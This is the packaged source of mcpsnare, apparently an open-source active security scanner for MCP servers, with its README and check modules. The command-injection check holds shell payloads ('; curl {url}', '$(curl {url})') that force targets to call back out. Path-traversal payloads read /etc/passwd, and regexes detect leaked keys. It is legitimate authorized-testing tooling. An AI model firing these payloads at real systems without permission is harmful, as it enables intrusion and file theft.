mcpsnare 0.3.0__tar.gz

mcpsnare-0.3.0/LICENSE

@@ -0,0 +1,21 @@
+MIT License
+
+Copyright (c) 2026 Dennis Sepede (Den-Sec)
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.

mcpsnare-0.3.0/PKG-INFO

@@ -0,0 +1,222 @@
+Metadata-Version: 2.4
+Name: mcpsnare
+Version: 0.3.0
+Summary: Active, confirmation-driven security scanner for MCP (Model Context Protocol) servers - Burp Active Scan, for MCP.
+Author-email: Dennis Sepede <dennisepede@proton.me>
+License: MIT
+Project-URL: Homepage, https://github.com/Den-Sec/mcpsnare
+Project-URL: Repository, https://github.com/Den-Sec/mcpsnare
+Project-URL: Issues, https://github.com/Den-Sec/mcpsnare/issues
+Project-URL: Changelog, https://github.com/Den-Sec/mcpsnare/blob/main/CHANGELOG.md
+Keywords: mcp,model-context-protocol,security,scanner,pentest,vulnerability,dast,appsec,ssrf,oob
+Classifier: Development Status :: 4 - Beta
+Classifier: Environment :: Console
+Classifier: Intended Audience :: Information Technology
+Classifier: Intended Audience :: Developers
+Classifier: License :: OSI Approved :: MIT License
+Classifier: Operating System :: OS Independent
+Classifier: Programming Language :: Python :: 3
+Classifier: Programming Language :: Python :: 3.11
+Classifier: Programming Language :: Python :: 3.12
+Classifier: Topic :: Security
+Classifier: Topic :: Software Development :: Testing
+Requires-Python: >=3.11
+Description-Content-Type: text/markdown
+License-File: LICENSE
+Requires-Dist: mcp>=1.0.0
+Requires-Dist: httpx>=0.27
+Requires-Dist: rich>=13.0
+Requires-Dist: cryptography>=42.0
+Provides-Extra: dev
+Requires-Dist: pytest>=8.0; extra == "dev"
+Requires-Dist: pytest-asyncio>=0.23; extra == "dev"
+Requires-Dist: uvicorn>=0.31; extra == "dev"
+Dynamic: license-file
+
+# mcpsnare
+
+**The active security scanner for MCP servers — _Burp Active Scan, for the Model Context Protocol._**
+
+[![ci](https://github.com/Den-Sec/mcpsnare/actions/workflows/ci.yml/badge.svg)](https://github.com/Den-Sec/mcpsnare/actions/workflows/ci.yml)
+[![Python](https://img.shields.io/badge/python-3.11%2B-blue)](https://www.python.org/)
+[![License: MIT](https://img.shields.io/badge/license-MIT-green.svg)](LICENSE)
+
+mcpsnare enumerates the tools an MCP server exposes, fires targeted payloads at their
+parameters, and reports **only what it can prove**. Every finding is tied to a concrete
+oracle — an out-of-band callback, a reflected canary, a calibrated timing delay — and
+carries a graded confidence level.
+
+Most "MCP security" tools pattern-match configs and source code. mcpsnare **triggers the
+vulnerability and catches the proof**: a `CONFIRMED` finding is exploitable, not theoretical.
+
+> _(Formerly published as `mcprobe`.)_
+
+## Demo
+
+A default scan of a vulnerable MCP server — no config, one command:
+
+```console
+$ mcpsnare scan --stdio "python vulnerable_server.py"
+[!] mcpsnare - authorized testing only.
+
+6 finding(s):
+  [HIGH]      Path traversal in read_doc.path         (confirmed)
+  [HIGH]      Secret/info leak via whoami             (firm)
+  [HIGH]      Path traversal in read_cfg.config.path  (confirmed)
+  [HIGH]      Path traversal in read_many.paths[0]    (confirmed)
+  [HIGH]      Path traversal in read_mode.path        (confirmed)
+  [CRITICAL]  Command injection in ping.host          (confirmed)
+```
+
+That `CRITICAL` command injection is `confirmed` because the injected payload made the
+target call back to a listener mcpsnare controls — an **out-of-band proof of execution**,
+not a guess. The same scan as machine-readable JSON (or SARIF / Markdown):
+
+```console
+$ mcpsnare scan --stdio "python vulnerable_server.py" --output json
+{
+  "summary": { "critical": 1, "high": 5, "medium": 0, "low": 0, "info": 0 },
+  "findings": [
+    {
+      "check": "path_traversal", "tool": "read_doc", "param": "path",
+      "severity": "high", "confidence": "confirmed", "cwe": "CWE-22",
+      "title": "Path traversal in read_doc.path",
+      "payload": "../../../../../../etc/passwd",
+      "evidence": "root:x:0:0:root:/root:/bin/bash",
+      "remediation": "Resolve and contain paths within an allowed base dir."
+    }
+    /* ... */
+  ]
+}
+```
+
+## Install
+
+From source (Python 3.11+):
+
+```bash
+git clone https://github.com/Den-Sec/mcpsnare && cd mcpsnare
+pip install -e ".[dev]"
+```
+
+This installs the `mcpsnare` console entry point. A PyPI release (`pipx install mcpsnare`)
+is imminent — see [Releases](https://github.com/Den-Sec/mcpsnare/releases).
+
+## Quickstart
+
+```bash
+# Local stdio server (launched as a subprocess)
+mcpsnare scan --stdio "python server.py"
+
+# Remote streamable-HTTP endpoint, with auth, emitting SARIF for code scanning
+mcpsnare scan --http https://host/mcp --header "Authorization: Bearer X" --output sarif
+
+# Add blocking time-based probes (off by default) and tune concurrency
+mcpsnare scan --stdio "python server.py" --aggressive --concurrency 8
+```
+
+## Why mcpsnare
+
+Most MCP security tooling is either a generic fuzzer (noisy, low-signal) or a
+defensive/static analyzer (reads config and source, never proves exploitability).
+mcpsnare is built around active confirmation:
+
+- **Oracle-backed, not guesses.** Every finding is tied to a concrete signal: an
+  **out-of-band (OOB)** callback, a **calibrated time** delay, a **canary** value
+  reflected in the response, or a **baseline diff**. No signal, no finding.
+- **Graded, calibrated confidence.** Findings carry an explicit confidence level
+  (**CONFIRMED / FIRM / TENTATIVE**, see [Confidence levels](#confidence-levels)).
+  Per-tool baseline calibration suppresses the usual false-positive classes — a
+  slow-but-safe tool, or output that merely looks secret-shaped, is not flagged.
+- **Reaches real schemas.** Maps injection points through nested objects, array items,
+  and params gated behind required enums; builds schema-valid baselines so payloads
+  actually reach the handler.
+- **Both transports.** Works against MCP servers over **stdio** (local process) and
+  **streamable HTTP** (remote endpoint, with custom headers/auth) — both exercised
+  end-to-end in CI on Linux and Windows.
+
+## Confidence levels
+
+Every finding carries one of three confidence levels, each earned by a specific oracle:
+
+| Level | Meaning | How it's earned |
+| ---------- | --------------------------------------------------- | --------------- |
+| **CONFIRMED** | The payload provably executed, or protected data was reached. | An out-of-band callback fired (cmd injection, SSRF), a canary value was read back (path traversal), or an unauthenticated call returned a response byte-identical to the authenticated one (auth bypass). |
+| **FIRM** | A calibrated/inferred signal strongly indicates the issue, short of an OOB proof. | A response delay exceeds the per-tool calibrated baseline by the injected sleep (time-based cmd injection); a secret-shaped string appears in the probe response but not in the benign baseline (info leak); or an unauthenticated response matches the authenticated one only after stripping volatile fields like timestamps/ids (auth bypass). |
+| **TENTATIVE** | Pattern-only match, with no calibration to corroborate it. | A secret-shaped string matched, but no baseline was available to prove the input triggered it — review manually. |
+
+The OOB and canary checks emit only **CONFIRMED**. Auth-bypass emits **CONFIRMED**
+on a byte-identical response or **FIRM** on a match after stripping volatile fields.
+The timing and info-leak oracles are where **FIRM** and **TENTATIVE** arise.
+
+## Checks
+
+| Check            | Vulnerability                  | CWE      |
+| ---------------- | ------------------------------ | -------- |
+| `cmd_injection`  | OS command injection           | CWE-78   |
+| `ssrf`           | Server-side request forgery    | CWE-918  |
+| `path_traversal` | Path traversal                 | CWE-22   |
+| `auth_bypass`    | Missing authentication         | CWE-306  |
+| `info_leak`      | Secret / sensitive info leak   | CWE-200  |
+| `sql_injection`  | SQL injection                  | CWE-89   |
+
+mcpsnare also enumerates MCP **resource templates** and treats their templated URI
+params (e.g. `file:///{path}`) as injection points for path-traversal and info-leak.
+
+## Out-of-band (OOB) confirmation
+
+OOB callbacks are how mcpsnare confirms blind command injection and SSRF: a probe
+makes the target reach back to a listener mcpsnare controls.
+
+- `--oob local` (default) spins up an in-process HTTP listener on localhost. It
+  needs no external service and works for targets that can reach your machine
+  (typically local stdio servers).
+- `--oob interactsh` uses an out-of-band interaction server for targets that
+  cannot reach localhost (e.g. remote HTTP servers). mcpsnare ships a real interactsh
+  client (RSA-OAEP / AES-256-CTR), so this works out of the box against the public
+  `oast.fun` (override with `--interactsh-server`); it was live-verified end to end.
+  See [docs/interactsh-runbook.md](docs/interactsh-runbook.md).
+- `--oob none` disables OOB confirmation; only time-based and canary oracles run.
+
+## Flags
+
+- `--stdio "<cmd>"` / `--http <url>` — target transport (one required).
+- `--header "k:v"` — add an HTTP header (repeatable).
+- `--oob {local,interactsh,none}` — OOB confirmation backend (`local` default).
+- `--aggressive` — also send blocking time-based (sleep) probes; by default mcpsnare
+  sends only non-blocking OOB/canary/pattern probes (time-based detection is aggressive-only).
+- `--concurrency N` — max concurrent probe requests (default 4). Time-based probes run serially.
+- `--rate R` — cap to R requests/second (default unlimited).
+- `--oob-timeout S` / `--oob-poll-interval S` — how long (default 20s) / how often (default 2.5s) to poll for OOB callbacks.
+- `--output {console,json,sarif,md}` — output format (default `console`).
+
+## Authorized testing only
+
+**mcpsnare is an active scanner. It sends real, potentially destructive payloads
+to the target.** Run it only against systems you own or have explicit written
+authorization to test. Unauthorized use may be illegal. You are responsible for
+how you use this tool.
+
+## Validation
+
+mcpsnare is validated by an automated test suite (119 tests) against bundled
+deliberately-vulnerable fixture servers in `tests/fixtures/`. The suite exercises
+command injection (including cross-OS cmd.exe / PowerShell payloads), SSRF, path
+traversal, info-leak, SQL injection, nested/array/enum injection points, and the OOB,
+baseline-calibration, and false-positive-suppression paths end to end — over **both**
+stdio and a live in-process streamable-HTTP server, on Linux and Windows in CI. See
+[docs/claims-matrix.md](docs/claims-matrix.md) for the claim-to-test mapping.
+
+It has also been smoke-tested against the real `@modelcontextprotocol/server-everything`
+reference server (13 tools, 2 resource templates) — clean run, zero false positives. See
+[docs/smoke-run.md](docs/smoke-run.md).
+
+## Roadmap
+
+- MCP-specific checks: tool-poisoning / prompt-injection via tool descriptions,
+  and tool-scope / permission-boundary violations.
+- Additional OOB providers and richer time-based oracles.
+
+## License
+
+MIT — see [LICENSE](LICENSE).

mcpsnare-0.3.0/README.md

@@ -0,0 +1,187 @@
+# mcpsnare
+
+**The active security scanner for MCP servers — _Burp Active Scan, for the Model Context Protocol._**
+
+[![ci](https://github.com/Den-Sec/mcpsnare/actions/workflows/ci.yml/badge.svg)](https://github.com/Den-Sec/mcpsnare/actions/workflows/ci.yml)
+[![Python](https://img.shields.io/badge/python-3.11%2B-blue)](https://www.python.org/)
+[![License: MIT](https://img.shields.io/badge/license-MIT-green.svg)](LICENSE)
+
+mcpsnare enumerates the tools an MCP server exposes, fires targeted payloads at their
+parameters, and reports **only what it can prove**. Every finding is tied to a concrete
+oracle — an out-of-band callback, a reflected canary, a calibrated timing delay — and
+carries a graded confidence level.
+
+Most "MCP security" tools pattern-match configs and source code. mcpsnare **triggers the
+vulnerability and catches the proof**: a `CONFIRMED` finding is exploitable, not theoretical.
+
+> _(Formerly published as `mcprobe`.)_
+
+## Demo
+
+A default scan of a vulnerable MCP server — no config, one command:
+
+```console
+$ mcpsnare scan --stdio "python vulnerable_server.py"
+[!] mcpsnare - authorized testing only.
+
+6 finding(s):
+  [HIGH]      Path traversal in read_doc.path         (confirmed)
+  [HIGH]      Secret/info leak via whoami             (firm)
+  [HIGH]      Path traversal in read_cfg.config.path  (confirmed)
+  [HIGH]      Path traversal in read_many.paths[0]    (confirmed)
+  [HIGH]      Path traversal in read_mode.path        (confirmed)
+  [CRITICAL]  Command injection in ping.host          (confirmed)
+```
+
+That `CRITICAL` command injection is `confirmed` because the injected payload made the
+target call back to a listener mcpsnare controls — an **out-of-band proof of execution**,
+not a guess. The same scan as machine-readable JSON (or SARIF / Markdown):
+
+```console
+$ mcpsnare scan --stdio "python vulnerable_server.py" --output json
+{
+  "summary": { "critical": 1, "high": 5, "medium": 0, "low": 0, "info": 0 },
+  "findings": [
+    {
+      "check": "path_traversal", "tool": "read_doc", "param": "path",
+      "severity": "high", "confidence": "confirmed", "cwe": "CWE-22",
+      "title": "Path traversal in read_doc.path",
+      "payload": "../../../../../../etc/passwd",
+      "evidence": "root:x:0:0:root:/root:/bin/bash",
+      "remediation": "Resolve and contain paths within an allowed base dir."
+    }
+    /* ... */
+  ]
+}
+```
+
+## Install
+
+From source (Python 3.11+):
+
+```bash
+git clone https://github.com/Den-Sec/mcpsnare && cd mcpsnare
+pip install -e ".[dev]"
+```
+
+This installs the `mcpsnare` console entry point. A PyPI release (`pipx install mcpsnare`)
+is imminent — see [Releases](https://github.com/Den-Sec/mcpsnare/releases).
+
+## Quickstart
+
+```bash
+# Local stdio server (launched as a subprocess)
+mcpsnare scan --stdio "python server.py"
+
+# Remote streamable-HTTP endpoint, with auth, emitting SARIF for code scanning
+mcpsnare scan --http https://host/mcp --header "Authorization: Bearer X" --output sarif
+
+# Add blocking time-based probes (off by default) and tune concurrency
+mcpsnare scan --stdio "python server.py" --aggressive --concurrency 8
+```
+
+## Why mcpsnare
+
+Most MCP security tooling is either a generic fuzzer (noisy, low-signal) or a
+defensive/static analyzer (reads config and source, never proves exploitability).
+mcpsnare is built around active confirmation:
+
+- **Oracle-backed, not guesses.** Every finding is tied to a concrete signal: an
+  **out-of-band (OOB)** callback, a **calibrated time** delay, a **canary** value
+  reflected in the response, or a **baseline diff**. No signal, no finding.
+- **Graded, calibrated confidence.** Findings carry an explicit confidence level
+  (**CONFIRMED / FIRM / TENTATIVE**, see [Confidence levels](#confidence-levels)).
+  Per-tool baseline calibration suppresses the usual false-positive classes — a
+  slow-but-safe tool, or output that merely looks secret-shaped, is not flagged.
+- **Reaches real schemas.** Maps injection points through nested objects, array items,
+  and params gated behind required enums; builds schema-valid baselines so payloads
+  actually reach the handler.
+- **Both transports.** Works against MCP servers over **stdio** (local process) and
+  **streamable HTTP** (remote endpoint, with custom headers/auth) — both exercised
+  end-to-end in CI on Linux and Windows.
+
+## Confidence levels
+
+Every finding carries one of three confidence levels, each earned by a specific oracle:
+
+| Level | Meaning | How it's earned |
+| ---------- | --------------------------------------------------- | --------------- |
+| **CONFIRMED** | The payload provably executed, or protected data was reached. | An out-of-band callback fired (cmd injection, SSRF), a canary value was read back (path traversal), or an unauthenticated call returned a response byte-identical to the authenticated one (auth bypass). |
+| **FIRM** | A calibrated/inferred signal strongly indicates the issue, short of an OOB proof. | A response delay exceeds the per-tool calibrated baseline by the injected sleep (time-based cmd injection); a secret-shaped string appears in the probe response but not in the benign baseline (info leak); or an unauthenticated response matches the authenticated one only after stripping volatile fields like timestamps/ids (auth bypass). |
+| **TENTATIVE** | Pattern-only match, with no calibration to corroborate it. | A secret-shaped string matched, but no baseline was available to prove the input triggered it — review manually. |
+
+The OOB and canary checks emit only **CONFIRMED**. Auth-bypass emits **CONFIRMED**
+on a byte-identical response or **FIRM** on a match after stripping volatile fields.
+The timing and info-leak oracles are where **FIRM** and **TENTATIVE** arise.
+
+## Checks
+
+| Check            | Vulnerability                  | CWE      |
+| ---------------- | ------------------------------ | -------- |
+| `cmd_injection`  | OS command injection           | CWE-78   |
+| `ssrf`           | Server-side request forgery    | CWE-918  |
+| `path_traversal` | Path traversal                 | CWE-22   |
+| `auth_bypass`    | Missing authentication         | CWE-306  |
+| `info_leak`      | Secret / sensitive info leak   | CWE-200  |
+| `sql_injection`  | SQL injection                  | CWE-89   |
+
+mcpsnare also enumerates MCP **resource templates** and treats their templated URI
+params (e.g. `file:///{path}`) as injection points for path-traversal and info-leak.
+
+## Out-of-band (OOB) confirmation
+
+OOB callbacks are how mcpsnare confirms blind command injection and SSRF: a probe
+makes the target reach back to a listener mcpsnare controls.
+
+- `--oob local` (default) spins up an in-process HTTP listener on localhost. It
+  needs no external service and works for targets that can reach your machine
+  (typically local stdio servers).
+- `--oob interactsh` uses an out-of-band interaction server for targets that
+  cannot reach localhost (e.g. remote HTTP servers). mcpsnare ships a real interactsh
+  client (RSA-OAEP / AES-256-CTR), so this works out of the box against the public
+  `oast.fun` (override with `--interactsh-server`); it was live-verified end to end.
+  See [docs/interactsh-runbook.md](docs/interactsh-runbook.md).
+- `--oob none` disables OOB confirmation; only time-based and canary oracles run.
+
+## Flags
+
+- `--stdio "<cmd>"` / `--http <url>` — target transport (one required).
+- `--header "k:v"` — add an HTTP header (repeatable).
+- `--oob {local,interactsh,none}` — OOB confirmation backend (`local` default).
+- `--aggressive` — also send blocking time-based (sleep) probes; by default mcpsnare
+  sends only non-blocking OOB/canary/pattern probes (time-based detection is aggressive-only).
+- `--concurrency N` — max concurrent probe requests (default 4). Time-based probes run serially.
+- `--rate R` — cap to R requests/second (default unlimited).
+- `--oob-timeout S` / `--oob-poll-interval S` — how long (default 20s) / how often (default 2.5s) to poll for OOB callbacks.
+- `--output {console,json,sarif,md}` — output format (default `console`).
+
+## Authorized testing only
+
+**mcpsnare is an active scanner. It sends real, potentially destructive payloads
+to the target.** Run it only against systems you own or have explicit written
+authorization to test. Unauthorized use may be illegal. You are responsible for
+how you use this tool.
+
+## Validation
+
+mcpsnare is validated by an automated test suite (119 tests) against bundled
+deliberately-vulnerable fixture servers in `tests/fixtures/`. The suite exercises
+command injection (including cross-OS cmd.exe / PowerShell payloads), SSRF, path
+traversal, info-leak, SQL injection, nested/array/enum injection points, and the OOB,
+baseline-calibration, and false-positive-suppression paths end to end — over **both**
+stdio and a live in-process streamable-HTTP server, on Linux and Windows in CI. See
+[docs/claims-matrix.md](docs/claims-matrix.md) for the claim-to-test mapping.
+
+It has also been smoke-tested against the real `@modelcontextprotocol/server-everything`
+reference server (13 tools, 2 resource templates) — clean run, zero false positives. See
+[docs/smoke-run.md](docs/smoke-run.md).
+
+## Roadmap
+
+- MCP-specific checks: tool-poisoning / prompt-injection via tool descriptions,
+  and tool-scope / permission-boundary violations.
+- Additional OOB providers and richer time-based oracles.
+
+## License
+
+MIT — see [LICENSE](LICENSE).

mcpsnare-0.3.0/mcpsnare/__init__.py

@@ -0,0 +1 @@
+__version__ = "0.3.0"

mcpsnare-0.3.0/mcpsnare/__main__.py

@@ -0,0 +1,4 @@
+from mcpsnare.cli import main
+
+if __name__ == "__main__":
+    main()

mcpsnare-0.3.0/mcpsnare/checks/__init__.py

@@ -0,0 +1,2 @@
+from mcpsnare.checks import (path_traversal, info_leak, cmd_injection, ssrf, auth_bypass,  # noqa: F401
+                            sql_injection)  # noqa: F401

mcpsnare-0.3.0/mcpsnare/checks/auth_bypass.py

@@ -0,0 +1,48 @@
+import re
+from mcpsnare.models import Probe, Finding, Severity, Confidence
+from mcpsnare.checks.base import register
+
+# Volatile substrings stripped before the tolerant compare, so a bypass is detected
+# even when the two bodies differ only by a timestamp / request-id / nonce. NOTE: a
+# bare record "id" is intentionally NOT stripped - a different record id is a real data
+# difference, not a volatile field, and stripping it would risk a false bypass.
+_VOLATILE = re.compile(
+    r"\d{4}-\d{2}-\d{2}[T ]\d{2}:\d{2}:\d{2}(?:\.\d+)?Z?"          # ISO timestamps
+    r"|[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}"  # UUIDs
+    r"|\"(?:ts|timestamp|nonce|request[_-]?id|trace[_-]?id)\"\s*:\s*\"?[^\",}]*\"?",
+    re.IGNORECASE,
+)
+
+
+def _normalize(s: str) -> str:
+    return _VOLATILE.sub("", s or "").strip()
+
+
+@register
+class AuthBypass:
+    id = "auth_bypass"
+    def generate(self, point, ctx):
+        if ctx.transport != "http" or ctx.call_tool_unauth is None:
+            return []
+        return [Probe(check=self.id, point=point, payload="<no auth header>",
+                      args=dict(point.base_args), meta={"needs_unauth": True})]
+    def evaluate(self, probe, response, ctx):
+        unauth = probe.meta.get("unauth_response")
+        if not unauth:
+            return None
+        if unauth == response:
+            # Raw byte-identical: a clear, directly-observed bypass.
+            return self._finding(probe, Confidence.CONFIRMED,
+                                 "tool callable without auth header (identical response)")
+        nu, nr = _normalize(unauth), _normalize(response)
+        if nu and nu == nr:
+            # Match only after stripping volatile fields: strong but inferred -> FIRM.
+            return self._finding(probe, Confidence.FIRM,
+                                 "tool callable without auth header (responses match modulo volatile fields)")
+        return None
+    def _finding(self, probe, conf, evidence):
+        return Finding(check=self.id, tool=probe.point.tool, param="-",
+                       severity=Severity.HIGH, confidence=conf, cwe="CWE-306",
+                       title=f"Missing authentication on {probe.point.tool}",
+                       payload=probe.payload, evidence=evidence,
+                       remediation="Enforce auth on the HTTP transport for all sensitive tools.")

mcpsnare-0.3.0/mcpsnare/checks/base.py

@@ -0,0 +1,27 @@
+from dataclasses import dataclass
+from typing import Callable, Protocol
+from mcpsnare.models import InjectionPoint, Probe, Finding, ToolBaseline
+
+
+@dataclass
+class CheckContext:
+    oob: object | None
+    transport: str
+    call_tool: Callable[[str, dict], str] | None = None
+    call_tool_unauth: Callable[[str, dict], str] | None = None
+    baseline: ToolBaseline | None = None
+    aggressive: bool = False
+
+
+class Check(Protocol):
+    id: str
+    def generate(self, point: InjectionPoint, ctx: "CheckContext") -> list[Probe]: ...
+    def evaluate(self, probe: Probe, response: str, ctx: "CheckContext") -> Finding | None: ...
+
+
+REGISTRY: dict[str, "Check"] = {}
+
+
+def register(cls):
+    REGISTRY[cls.id] = cls()
+    return cls

mcpsnare-0.3.0/mcpsnare/checks/cmd_injection.py

@@ -0,0 +1,73 @@
+from mcpsnare.models import Probe, Finding, Severity, Confidence
+from mcpsnare.checks.base import register
+
+_SLEEP_SECONDS = 5
+_LATENCY_MULT = 3
+
+# OOB confirmation payloads: each triggers an outbound request to {url}. Covers POSIX
+# sh, Windows cmd.exe, and PowerShell, deduped. Non-blocking (always sent).
+_OOB_TEMPLATES = (
+    "; curl {url}",          # POSIX
+    "$(curl {url})",         # POSIX command substitution
+    "& curl {url}",          # cmd.exe / POSIX background
+    "| curl {url}",          # cmd.exe / POSIX pipe
+    "; iwr {url}",           # PowerShell (Invoke-WebRequest)
+    "; curl.exe {url}",      # PowerShell (real curl, not the iwr alias)
+)
+
+# Blocking time-based payloads (~_SLEEP_SECONDS delay), sent only with --aggressive.
+_SLEEP_TEMPLATES = (
+    "; sleep {n}",                # POSIX
+    "$(sleep {n})",               # POSIX command substitution
+    "& ping -n {n1} 127.0.0.1",   # cmd.exe (no sleep builtin; ping ~1s/echo)
+    "; Start-Sleep -s {n}",       # PowerShell
+)
+
+@register
+class CmdInjection:
+    id = "cmd_injection"
+    def generate(self, point, ctx):
+        probes = []
+        if ctx.oob is not None:
+            for tpl in _OOB_TEMPLATES:
+                token, url = ctx.oob.new_token()
+                cmd = tpl.format(url=url)                  # separator+command, e.g. "; curl <url>"
+                whole_args = point.set(f"mcpsnare{cmd}")
+                embed_args = point.embed(cmd)             # valid-value prefix + cmd
+                variants = [whole_args]
+                if embed_args != whole_args:
+                    variants.append(embed_args)
+                for args in variants:
+                    from mcpsnare.inject.jsonpath import deep_get
+                    payload = deep_get(args, point.json_path)
+                    probes.append(Probe(check=self.id, point=point, payload=str(payload),
+                                        args=args, token=token))
+        if getattr(ctx, "aggressive", False):
+            for tpl in _SLEEP_TEMPLATES:
+                pl = f"mcpsnare{tpl.format(n=_SLEEP_SECONDS, n1=_SLEEP_SECONDS + 1)}"
+                probes.append(Probe(check=self.id, point=point, payload=pl, args=point.set(pl),
+                                    meta={"time_based": True, "threshold": _SLEEP_SECONDS}))
+        return probes
+    def evaluate(self, probe, response, ctx):
+        if probe.token and ctx.oob and ctx.oob.interactions(probe.token):
+            return self._finding(probe, Confidence.CONFIRMED,
+                                 f"OOB callback received for payload {probe.payload!r}")
+        if probe.meta.get("time_based"):
+            elapsed = probe.meta.get("elapsed", 0)
+            sleep_s = probe.meta["threshold"]
+            baseline = getattr(ctx, "baseline", None)
+            if baseline is not None:
+                margin = max(baseline.latency + sleep_s * 0.8, baseline.latency * _LATENCY_MULT)
+                evidence = f"response delayed {elapsed:.1f}s vs baseline {baseline.latency:.1f}s"
+            else:
+                margin = sleep_s  # no calibration: fall back to the fixed threshold
+                evidence = f"response delayed {elapsed:.1f}s"
+            if elapsed >= margin:
+                return self._finding(probe, Confidence.FIRM, evidence)
+        return None
+    def _finding(self, probe, conf, evidence):
+        return Finding(check=self.id, tool=probe.point.tool, param=probe.point.param_name,
+                       severity=Severity.CRITICAL, confidence=conf, cwe="CWE-78",
+                       title=f"Command injection in {probe.point.tool}.{probe.point.param_name}",
+                       payload=probe.payload, evidence=evidence,
+                       remediation="Never pass tool input to a shell; use exec with arg arrays / allowlists.")

mcpsnare-0.3.0/mcpsnare/checks/info_leak.py

@@ -0,0 +1,43 @@
+import re
+from mcpsnare.models import Probe, Finding, Severity, Confidence
+from mcpsnare.checks.base import register
+
+_MARKERS = [re.compile(p) for p in [
+    r"-----BEGIN [A-Z ]*PRIVATE KEY-----", r"AKIA[0-9A-Z]{16}",
+    r"(?i)api[_-]?key\s*[=:]\s*\S+", r"(?i)secret\s*[=:]\s*\S+",
+    r"xox[baprs]-[0-9A-Za-z-]+", r"eyJ[A-Za-z0-9_-]{10,}\.[A-Za-z0-9_-]{10,}\."]]
+
+
+@register
+class InfoLeak:
+    id = "info_leak"
+    def generate(self, point, ctx):
+        return [Probe(check=self.id, point=point, payload="mcpsnare-probe",
+                      args=point.set("mcpsnare-probe"))]
+    def evaluate(self, probe, response, ctx):
+        hits = [m.pattern for m in _MARKERS if m.search(response or "")]
+        if not hits:
+            return None
+        baseline = getattr(ctx, "baseline", None)
+        if baseline is not None:
+            # Diff by which PATTERN matched, not the matched substring: this favors FP
+            # elimination (a docs tool with a fixed example key is suppressed). Known
+            # trade-off (disclosed in docs/claims-matrix.md): a baseline placeholder and
+            # a real leak of the SAME shape both match one pattern, so such a leak is missed.
+            base_hits = {m.pattern for m in _MARKERS if m.search(baseline.response or "")}
+            triggered = [h for h in hits if h not in base_hits]
+            if not triggered:
+                return None  # secrets also present in benign baseline = normal output, not a leak
+            return self._finding(probe, Confidence.FIRM,
+                                 f"secret-shaped match triggered by input (absent in baseline): {triggered}")
+        if len(hits) >= 2:
+            return self._finding(probe, Confidence.TENTATIVE,
+                                 f"secret-shaped pattern match (no baseline to diff): {hits}")
+        return None
+
+    def _finding(self, probe, conf, evidence):
+        return Finding(check=self.id, tool=probe.point.tool, param=probe.point.param_name,
+                       severity=Severity.HIGH, confidence=conf, cwe="CWE-200",
+                       title=f"Secret/info leak via {probe.point.tool}",
+                       payload=probe.payload, evidence=evidence,
+                       remediation="Never return secrets/credentials in tool output or errors.")

mcpsnare-0.3.0/mcpsnare/checks/path_traversal.py

@@ -0,0 +1,25 @@
+import re
+from mcpsnare.models import Probe, Finding, Severity, Confidence
+from mcpsnare.checks.base import register
+
+_PAYLOADS = ["../../../../../../etc/passwd",
+             "..\\..\\..\\..\\..\\..\\windows\\win.ini"]
+_CANARY = re.compile(r"root:x:0:0:|\[fonts\]", re.IGNORECASE)
+
+
+@register
+class PathTraversal:
+    id = "path_traversal"
+    def generate(self, point, ctx):
+        out = []
+        for pl in _PAYLOADS:
+            out.append(Probe(check=self.id, point=point, payload=pl, args=point.set(pl)))
+        return out
+    def evaluate(self, probe, response, ctx):
+        if _CANARY.search(response or ""):
+            return Finding(check=self.id, tool=probe.point.tool, param=probe.point.param_name,
+                           severity=Severity.HIGH, confidence=Confidence.CONFIRMED, cwe="CWE-22",
+                           title=f"Path traversal in {probe.point.tool}.{probe.point.param_name}",
+                           payload=probe.payload, evidence=(response or "")[:200],
+                           remediation="Resolve and contain paths within an allowed base dir.")
+        return None